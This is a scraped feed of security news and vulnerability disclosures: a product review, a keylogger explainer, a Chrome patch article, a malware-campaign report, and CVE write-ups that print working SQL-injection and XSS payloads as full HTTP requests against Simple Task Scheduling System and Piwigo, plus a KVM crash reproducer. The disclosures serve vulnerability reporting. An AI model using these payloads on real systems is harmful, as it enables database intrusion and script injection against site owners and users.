By Owais Sultan
If your MS Access database is corrupted or is in an inconsistent state, you can use the Compact…
This is a post from HackRead.com Read the original post: Stellar Repair for Access – Software Review

If your MS Access database is corrupted or is in an inconsistent state, you can use the Compact and Repair utility. However, sometimes, this inbuilt MS Access utility does not bring the desired results or fails to repair the database.

In such a case, the best solution is to use an advanced Access repair tool. One such tool is Stellar Repair for Access which can repair severely corrupt Access database (MDB and ACCDB) files and recover all the data. Let’s talk in detail about Stellar Repair for Access and see how it works.

**About Stellar Repair for Access**

Stellar Repair for Access is a powerful software that is designed to repair corrupt or damaged MS Access database (.mdb /.accdb) files. It recovers all the database objects, like queries, linked lists, forms, tables, reports, etc. with 100% integrity.

It can also recover deleted records from corrupted Access database files. The software is compatible with all MS Access versions, including 2007, 2010, 2013, 2016, and 2019. 

**Salient Features of Stellar Repair for Access**

Here are some key features of Stellar Repair for Access:

*   **Repairs ACCDB and MDB Files:** The software repairs corrupted or damaged ACCDB files (created in recent versions of MS Access) and also MDB files (of MS Access 2007 and earlier versions). The software can repair database files irrespective of the MS Access version you’re using.

*   **Repairs Database Objects:** After repairing the file, the software recovers all the database objects, like tables, queries, macros, linked tables, modules, forms, etc. It allows you to save the recovered data in a new database file.

*   Repairs Split Database: The software also allows to repair of split databases. It also recovers the data stored in the corrupt linked tables connected to different databases.

*   **Recovers Deleted Data:** Stellar Repair for Access offers a feature to recover deleted records from the corrupt Access database file.
*   **Helps Fix Various Database Errors:** The Stellar repair tool helps fix different errors that arise from database corruption, like Access update query is corrupt, database filename.mdb needs to be repaired, unrecognized database format, and others.

**How to Install Stellar Repair for Access?**

Installation of Stellar Repair for Access is quite easy and requires only a few steps. However, before installing the software, your system must meet the following minimum requirements:

*   Processor: Intel compatible (x86, x64)
*   Operating System: Windows 11, 10, 8.1, 8, and 7
*   Memory: 8 GB (recommended), 4 GB (minimum)
*   Hard Disk: 250 MB of free space
*   Version Support: MS Access 2019, 2016, 2013, 2010, 2007, 2003, 2002, and  Office 365.

Here are the steps to install the software:

*   Download the **StellarRepairforAccess.exe** from the official website and double-click on it to open the Setup dialog box.  
    
*   Click **Next** and the License Agreement dialog box appears.  
    
*   Choose the **I accept the agreement** option and click **Next**.  
    
*   It will display the **Select Destination Location** dialog box.  
    
*   Click **Browse** to choose the destination path and click **Next.**  
     
*   The “**Select Start Menu folder**” dialog box appears. Click **Next.**   
    
*   Then, the **Ready to install dialog box** is displayed. Click **Install.**  
    
*   Once installation is complete, click Finish

**How to Use Stellar Repair for Access to Repair the Database?**

Stellar Repair for Access has an intuitive interface that makes the repair process easy and simple. Even users with little or no technical expertise can easily operate the software and repair the database.

Here are the steps to repair corrupted Access file using the software:

*   Launch the software and click the **Select** **Database** tab on the main menu. It will open a new window. 

*   You will see two options: **Browse** and **Find**. Click **Browse** if you know the path of the corrupted file. If you don’t know the location of the file, click **Find.** The software will search and list all the database files on your system.  
    
*   After selecting the file, click **Repair**.  
    
*   It will start the repair process. Wait for a few minutes till the process completes.  
    
*   Once the process finishes, it will provide a preview of all the objects in the repaired database.  
    
*   You can select the specific object to preview its data.

*   Now, go to the **Home** ribbon and click **Save Database** to save the repaired database. 

*   Choose the desired destination to save the repaired file and click **OK**.

*   The message “**Repaired file saved successfully**” is displayed. Click **OK.**

**Verdict**

Stellar Repair for Access is an excellent choice when it comes to repairing corrupt Access database files. The software is easy-to-use and recovers all the components from the corrupt file. So, if your database is severely corrupt, use Stellar Repair for Access to save your time and effort as well.

1.  Stellar Repair for Outlook Software Review
2.  Product Review – Stellar Repair for MS SQL
3.  Software Review: Stellar Repair for Exchange
4.  Stellar Converter for OST – OST to PST Conversion?
5.  Software Review – Stellar Data Recovery Professional

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Stellar Repair for Access – Software Review

Categories: News
People are often confused as to where the security industry draws the line between something that is considered a keylogger and something that is not. Read on to learn what this term means, from a practical perspective.



(Read more...)




The post What is a keylogger? appeared first on Malwarebytes Labs.

A blog post published earlier this year posed the question "Is Grammarly a keylogger?" I have personally had people reference that post and ask me to add detection of Grammarly to Malwarebytes. The answer has always been, "no." Whether or not you like what Grammarly does, Grammarly is not a keylogger, according to the way that term is used by the security industry.

This begs the question: exactly what _is_ a keylogger, then?

**A keylogger is anything that logs keystrokes, right?**

Well, no. This is way too broad a definition, since there are countless programs installed on every computer on earth designed to capture and save your keystrokes. Any word processor, for example. For that matter, any productivity software, whether that be a word processor, a notepad, a spreadsheet, a slideshow app, etc. Even something as low level as a Terminal window will record everything you type in the command history.

Using a computer made in the last several decades is all about typing things in a keyboard, and some program doing something with all those button presses. There's a tongue-in-cheek saying about a common piece of advice for avoiding phishing attacks: you can't tell the user to stop clicking things on the thing-clicking machine. Similarly, if you're going to blow the whistle at anything that captures your keystrokes, you're fighting a losing battle.

**Is it something that sends your keystrokes somewhere?**

We're getting closer, but still no. Think about the things you use every day. A web browser, for example. Every time you type a search in a browser, what you type is sent off to the search engine of your choosing (most likely Google). Plus, there are tons of websites that will save things you type on the server. Consider Google docs, for example. Everything you type in such a document in your browser gets sent off to Google.

The web browser isn't the only guilty party, of course. Consider Apple's Notes app. Depending on your settings, everything you type in the Notes app will be synced to iCloud. The same is true of Microsoft's OneNote app. For that matter - again, depending on your settings - doing a Spotlight search on your Mac can send everything you type in the search bar to Apple.

This is clearly where Grammarly lies. It collects keystrokes and sends them off your device for the purpose of having their backend system check the grammar of what you typed. Would it be better if it could do all that on the device? Certainly, though I know nothing of the technical reasons why that decision was made. Would I personally use Grammarly? Not a chance. However, there are many people who need a grammar checker and like the features Grammarly offers.

Clearly, these things are all legitimate apps, offering legitimate functionality. This definition is still too broad to be useful.

**Then what IS a keylogger?**

A more useful definition would be:

> A keylogger is a program that collects keystrokes and sends them to a third-party, solely for the benefit of that third-party.

The key differentiator between a keylogger and something more legitimate is that it's not collecting your keystrokes for your benefit. Instead, someone else intends to use what you typed for some purpose of their own, nefarious or otherwise. However, within this definition, there are a few different types of keyloggers.

**"Potentially unwanted" keyloggers**

A keylogger may be identified as a "PUP" (which stands for "Potentially Unwanted Program") if it's software that is sold legally and openly. Such programs are often marketed as tools for monitoring your children or employees, and as such have a theoretical legitimate use. (I have some strongly negative opinions about the use of keylogging software for such purposes, but to each their own.)

However, such keyloggers are also very commonly misused. In reality, legitimate usage of such keyloggers is probably dwarfed by illegitimate usage. People with access to someone else's device can install them without the owner's knowledge for unsavory - even malicious - reasons. This is quite common with intimate partner abuse, stalking, workplace harassment, etc.

For this reason, most security software will detect these so-called "legitimate" keyloggers as PUPs. Malwarebytes, as a member of the Coalition Against Stalkerware, is certainly no exception.

**Adware keyloggers**

These keyloggers are things that collect keystrokes within certain contexts for the purposes of targeting you with ads, building a profile to better understand you as a target for ads, or as a means of better understanding the entire customer base. An example of the type of data that such a program might collect would be every search you enter in your browser and every site you visit (whether that's by typing the address in the address bar or clicking a link). Such programs often go well beyond just logging keystrokes, and will collect things such as your browser history, browser of choice, software installed on your computer, your location, etc.

These programs will generally trick the user into installing them, using a variety of lures. The old fake Adobe Flash Player installer trick is one of the most common, even now, when Flash is long dead. Generally speaking, though, these are spread in the form of trojans: ie, programs the user is tricked into downloading and running.

Such programs are either malware or just shy of malware, depending on your definition. Either way, they serve no legitimate purpose for anyone other than shady advertisers and deserve to be deleted with extreme prejudice. The only good news is that it is not the intent of these programs to harm you (though poor data handling practices by shady adware companies definitely could cause harm regardless of intent).

**Malicious keyloggers**

The most concerning category of keyloggers. These are the ones without any supposed "legitimate" purpose, and are intended for nothing but to steal your information. Such keyloggers are often used to collect sensitive information, such as account credentials, credit card numbers, social security numbers, and more.

Malicious keyloggers get onto your machine through a variety of means. They could be trojans, often using a lure more convincing than a fake Flash installer. They could infect your machine through a browser vulnerability that allows arbitrary code to execute. (This is less common on Macs than on Windows, but is nonetheless an increasing problem for Mac users.)

Such malware has also been known to have been installed manually, by attackers who have gotten access to the machine somehow, via physical or remote access. In a well-known case, the creator of the FruitFly malware is known to have used passwords obtained from data breaches to gain access to victims' Macs. He used a process called "credential stuffing," in which a password obtained from one online account is used to attempt to log in to something else. Since so many people reuse passwords, this is unfortunately a fairly reliable strategy.

In the case of malicious keyloggers, the software is rarely limited to just capturing keystrokes. Most malicious spyware has keylogging capabilities as only a part of the complete package, also including - among other things - file collection, capture of the screen contents, capture of video and audio via the webcam and microphone, and even execution of arbitrary commands. Thus, most such malware is not referred to as a "keylogger," but rather is called "spyware."

**How do I protect myself from keyloggers?**

Obviously, one way to do so is to use some kind of antivirus software, such as Malwarebytes. If you think you might be being targeted by someone using a PUP keylogger, make sure that the software you use detects such software. Membership in the Coalition Against Stalkerware would be a good indication of that.

You can avoid some of the common means that attackers may use to install a keylogger on your device by making sure you use a strong login password on your computer. Make sure it's one that nobody could guess, and don't leave your computer logged in and unattended. If you need to share your computer with someone, don't let them use your account on the computer. Instead, create a separate account for that person and do not give them admin privileges. (On a Mac, this can be done in **System Preferences** -> **Users & Groups**.)

When it comes to the more malicious stuff, be careful about what you download. If a website tells you that you need to install something to see its content, or tells you that you're infected and that you need to install something to fix it, run away screaming. (If you're in a public place, you may want to consider just closing the browser window, though; otherwise you may get strange looks.)

It's also critically important to keep your system up-to-date. Doing so ensures that your system is protected against known vulnerabilities that could be used to infect your device. On a Mac, go to **System Preferences** -> **Software Update** and check the box reading **Automatically keep my Mac up to date.**

Doing these things is never a guarantee, but they will go a long way towards reducing the chances of ever being affected by a keylogger.

What is a keylogger?

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /categories/view_category.php.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/categories/view\_category.php

Vulnerability location: /tss/admin/categories/view\_category.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/categories/view\_category.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/categories/view\_category.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36676: bug_report/SQLi-1.md at main · Nujabe4/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/manage_schedule.php.

Permalink

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/manage\_schedule.php

Vulnerability location: /tss/admin/schedules/manage\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/manage\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/manage\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36675: bug_report/SQLi-2.md at main · Nujabe4/bug_report

Simple Task Scheduling System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /schedules/view_schedule.php.

Permalink

Cannot retrieve contributors at this time

**Simple Task Scheduling System v1.0 by oretnom23 has SQL injection**

BUG\_Author: RUST

vendors: https://www.sourcecodester.com/php/15328/simple-task-scheduler-system-phpoop-free-source-code.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /tss/admin/schedules/view\_schedule.php

Vulnerability location: /tss/admin/schedules/view\_schedule.php, id

db\_name = tss\_db;length=6

\[+\] Payload: /tss/admin/schedules/view\_schedule.php?id=1%27%20and%20length(database())%20=6--+ // Leak place ---> id

GET /tss/admin/schedules/view\_schedule.php?id\=1%27%20and%20length(database())%20\=6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=tc6akb10bh652defck09t9eug4
Connection: close

When length (database ()) = 6 

When length (database ()) = 5

CVE-2022-36674: bug_report/SQLi-3.md at main · Nujabe4/bug_report

But one issue that lets websites overwrite content on a user's system clipboard appears unfixed in the new Version 105 of Chrome.

Google's first stable channel version of Chrome 105 for Windows, Mac, and Linux, released this week, contained fixes for 24 vulnerabilities in previous versions of the software, including one "critical" flaw and eight that the company rated as being of "high" severity.

A plurality — nine — of the security issues that Google addressed with Chrome 105 were so-called use-after-free vulnerabilities, or flaws that allow attackers to use previously freed memory spaces to execute malicious code, corrupt data, and take other malicious actions. Four of the patched vulnerabilities were heap buffer-overflows in various Chrome components, including WebUI and Screen Capture.

Attackers often exploit buffer overflows for a variety of malicious purposes, including executing random code, overwriting data, crashing systems, and triggering denial-of-service conditions.

**Clipboard Overwriting**

One issue that Google does not appear to have fixed in the update centers around clipboards. According to Malwarebytes, when users of Google Chrome — or any Chromium-based browser — visit a website, the site can push any content they want to the user's OS clipboard, without the user's permission or any interaction.

"This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge," Malwarebytes said.

This can result in users losing valuable data they might have wanted to cut and paste elsewhere while also giving attackers an opening to try and sneak malicious code on a user's system, the security vendor said. The problem has to do with the absence of any requirement in Chrome and Chromium-based browser for users to take specific steps such as using "Ctrl+C" to copy content from a website to the user's clipboard, Malwarebytes said.

Security researcher Jeff Johnson identified the issue with Chrome as part of a broader problem that impacts both Safari and Firefox as well. "Chrome is currently the worst offender, because the user gesture requirement for writing to the clipboard was accidentally broken in version 104," he said in a report this week.

However, the reality is that users of other browsers such as Firefox and Safari can have websites overwriting their system clipboards more easily than they realize, Johnson said. Though both these browsers require users to take some action to copy website content to their clipboards, the actions are a lot broader than they might imagine.

For instance, actions like focusing out on a screen, or pressing keydown/ keyup and mousedown/ mouseup, can result in website content getting copied to the clipboard without the user's knowledge, Johnson said.

The researcher noted that Chrome developers are already aware of the issue and are addressing it. Google did not immediately response to a Dark Reading request for comment.

"Attackers may abuse this bug to copy malicious links to users' clipboards, which could result in users pasting those links in their address bar and accessing malicious sites accidentally," says Ivan Righi, senior cyber threat analyst at Digital Shadows.

"Another way this bug could be exploited is to conduct fraudulent cryptocurrency transactions. Threat actors could leverage the flaw in conjunction with social engineering attacks to get users to enter the wrong wallet addresses for transactions," Righi says. However, the likelihood of such attacks being successful is low because users are likely going to notice abnormal contents placed on their clipboard, he says.

**A Plethora of Use-After-Free Issues**

Meanwhile, the sole critical vulnerability (CVE-2022-3038) Google addressed with the stable version of Chrome 105 was reported by a security researcher from its own Project Zero bug hunting team: The use-after-free flaw in Google Chrome Network Service gives remote attackers a way to execute arbitrary code or trigger denial of service conditions on user systems by getting them to visit a weaponized website.

External bug hunters and security researchers reported all the remaining vulnerabilities that Google addressed this week in Chrome. The most consequential among them appears to have been CVE-2022-3039, a high-severity, user-after-free vulnerability in WebSQL that two researchers from China's 360 Vulnerability Research Institute reported to Google. The researchers received $10,000 for reporting the bug to Google — the highest amount awarded in the current set.

Another high-impact, use-after-free flaw in Chrome Layout garnered $9,000 for the anonymous security researcher that reported the issue to Google. Bounties for the remaining bugs ranged from $1,000 to $7,500. Google has not yet determined rewards for four bug disclosures.

As has become standard practice among major vendors, Google said it has restricted access to bug details until most users have an opportunity to implement the new, stable version of Chrome.

"We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on but haven’t yet fixed," Google said in a blog this week. A senior Microsoft security executive had recently used the same reason to explain why Microsoft's bug disclosures also contain scant details these days.

While the bug fixes are almost certainly the primary reason why users might want to update to the stable version of Chrome 105, the new browser version also introduces a handful of additional features. These include features that allow developers to add windows controls button — such as closing, maximizing, or minimizing — to progressive Web apps, a new picture-in-picture API for Chrome on Android, and improvements to Chrome's Navigation API.

Google Fixes 24 Vulnerabilities With New Chrome Update

Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list.

The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick a user to visit some crafted URL that is connected exactly to this system. Then he can trick the user to visit some malicious address that the victim will think is connected with the original web address it depending on the scenario. This can be dangerous for all users of this system.

GET /piwigo/index.php?/search/4863/created\-monthly\-list%22%3Ehttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcomhttps:\\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned\_host.com
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: en\-US,en;q\=0.5
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg\_id\=hctfqtab45adhogo2suhq2mr0c; ssc\_phoneSwap\=0
Upgrade\-Insecure\-Requests: 1

CVE-2022-37183: CVE-nu11secur1ty/vendors/Piwigo/2022/12.3.0 at main · nu11secur1ty/CVE-nu11secur1ty

By Waqas
Researchers have identified a new Golang-based malware campaign leveraging deep field images from the James Webb Space Telescope to deploy malware on infected devices. 
This is a post from HackRead.com Read the original post: Hackers spreading malware through images taken by James Webb Space Telescope

National Aeronautics and Space Administration’s (**NASA**) James Webb Space Telescope is known for the stunning images from space that it has been delivering us since its launching. Given its superior technology, the telescope can capture the earliest galaxies created shortly after the Big Bang.

Reportedly, hackers are also aware of their popularity and have decided to monetize from it.

**Beware of Images Containing Malware**

Securonix security researchers have identified a new Golang-based malware campaign leveraging deep field images from the James Webb Space Telescope to deploy malware on infected devices.

Dubbed GO#WEBBFUSCATOR, this persistent campaign highlights the increasing preference of malware operators for the Go programming language, probably because of its cross-platform support that lets hackers target different operating systems through a common codebase.

**Attack Details**

In their **report**, researchers D. Iuzvyk, T. Peck, and O. Kolesnikov explained that this campaign involves sending phishing emails that contain a Microsoft Office attachment named Geos-Rates.docx. The file is downloaded as a template.

These emails are the attack chain’s entry point. When the attachment is opened, an obfuscated VBA macro is auto-executed if the recipient has enabled macros. When executed, the macro downloads an image file titled OxB36F8GEEC634.jpg.

This appears to be the image of the First Deep Field sent from the telescope, but in reality, it is a Base64-encoded payload. The Windows 64-bit executable binary is 1.7MB in size. It can easily evade antimalware solutions and uses a technique called gobfuscation to utilize a Golang obfuscation tool, which is publicly available on GitHub.

According to researchers, crooks are using encrypted DNS queries/responses to communicate with the C2 server through which the malware can accept and run commands sent via the server through Windows Command Prompt.

> “Using a legitimate image to build a Golang binary with Certutil is not very common. It’s clear that the original author of the binary designed the payload with both some trivial counter-forensics and anti-EDR detection methodologies in mind,” researchers noted.
> 
> Securonix Threat Labs

1.  **Attackers successfully hide Mac malware in ad images**
2.  **Fake Cloudflare DDoS protection popups distribute malware**
3.  **GoogleUserContent CDN Hosting Images Infected with Malware**
4.  **Hackers exploit Raspberry Pi device to hack NASA’s mission system**
5.  **New attack spreads LokiBot and NanoCore malware in ISO image files**
6.  **Hacker disrupts Emotet botnet operation by replacing payload with GIFs**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Hackers spreading malware through images taken by James Webb Space Telescope

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2022-2590: security - CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions

A NULL pointer dereference issue was found in KVM when releasing a vCPU with dirty ring support enabled. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 7 Apr 2022 10:15:42 +0800 (GMT+08:00)
From: kangel <kangel@....edu.cn>
To: oss-security@...ts.openwall.com
Cc: pgn@....edu.cn, qiuhao@...ec.org
Subject: Linux kernel: x86/kvm: null-ptr-deref in kvm\_dirty\_ring\_push




-----原始邮件-----
发件人:kangel <kangel@....edu.cn>
发送时间:2022-04-06 21:11:39 (星期三)
收件人: security@...nel.org, linux-distros@...openwall.org
抄送: secalert@...hat.com, pbonzini@...hat.com, pgn@....edu.cn, qiuhao@...ec.org
主题: \[vs\] x86/kvm: null-ptr-deref in kvm\_dirty\_ring\_push


Hi developers,
    We found a null-ptr-deref in the kvm module which can lead to DoS. This flaw is in kvm\_dirty\_ring\_push in virt/kvm/dirty\_ring.c. The linux kernel version is 5.17.0-rc8. We would appreciate a CVE ID if this is a security issue.
------------\[ Description \]------------
    When we call kvm\_vcpu\_release(), it will call kvm\_dirty\_ring\_free() which will free ring->dirty\_gfns and set it to NULL. Then if we can set kvm->dirty\_ring\_size != NULL\[1\] and make vcpu->arch.st.preempt to NULL\[2\], it will call kvm\_dirty\_ring\_push() and lead to null-ptr-deref in virt/kvm/dirty\_ring.c:159.
    The condition of \[1\] can be set by do ioctl$KVM\_CAP\_DIRTY\_LOG\_RING and the condition of \[2\] can be set by race of doing ioctf$KVM\_RUN.
------------\[ Reproducer \]------------
qemu run:
qemu-system-x86\_64 -m 512M -smp 2 -kernel /home/zju/linux-5.17-rc8/arch/x86/boot/bzImage -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0 nokaslr" -drive file=/home/zju/script/stretch2.img,format=raw -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 -net nic,model=e1000 -enable-kvm -nographic 
poc.c is attached( run in qemu).
gcc poc.c -static -o poc -lpthread

------------\[ Credits \]------------
Yongkang Jia (Zhejiang University)
Gaoning Pan (Zhejiang University)
Qiuhao Li (Harbin Institute of Technology)
------------\[ Backtrace \]------------
KASAN: null-ptr-deref in range \[0x0000000000000030-0x0000000000000037\]
CPU: 0 PID: 453 Comm: syz-executor425 Not tainted 5.17.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1~cloud0 04/01/2014
RIP: 0010:kvm\_dirty\_ring\_push+0x10c/0x2e0 arch/x86/kvm/../../../virt/kvm/dirty\_ring.c:159
Code: 0f 8e 8e 01 00 00 48 b8 00 00 00 00 00 fc ff df 41 83 ec 01 44 23 65 00 49 c1 e4 04 4c 01 e3 48 8d 7b 04 48 89 fa 48 c1 ea 03 <0f> b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 47
RSP: 0018:ffff88800812fb88 EFLAGS: 00010207
RAX: dffffc0000000000 RBX: 0000000000000030 RCX: ffffffffa5a929d4
RDX: 0000000000000006 RSI: 0000000000000000 RDI: 0000000000000034
RBP: ffff888004d12118 R08: 0000000000000001 R09: fffffbfff5104469
R10: 0000000000000000 R11: fffffbfff5104468 R12: 0000000000000030
R13: 0000000000000000 R14: 0000000000000000 R15: ffff888004d10dd0
FS:  0000000000868880(0000) GS:ffff88806d200000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020ffe010 CR3: 0000000005ba4002 CR4: 00000000003726f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
 <TASK>
 mark\_page\_dirty\_in\_slot+0x192/0x270 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:3171
 kvm\_steal\_time\_set\_preempted arch/x86/kvm/x86.c:4600 \[inline\]
 kvm\_arch\_vcpu\_put+0x34e/0x5b0 arch/x86/kvm/x86.c:4618
 vcpu\_put+0x1b/0x70 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:211
 vmx\_free\_vcpu+0xcb/0x130 arch/x86/kvm/vmx/vmx.c:6985
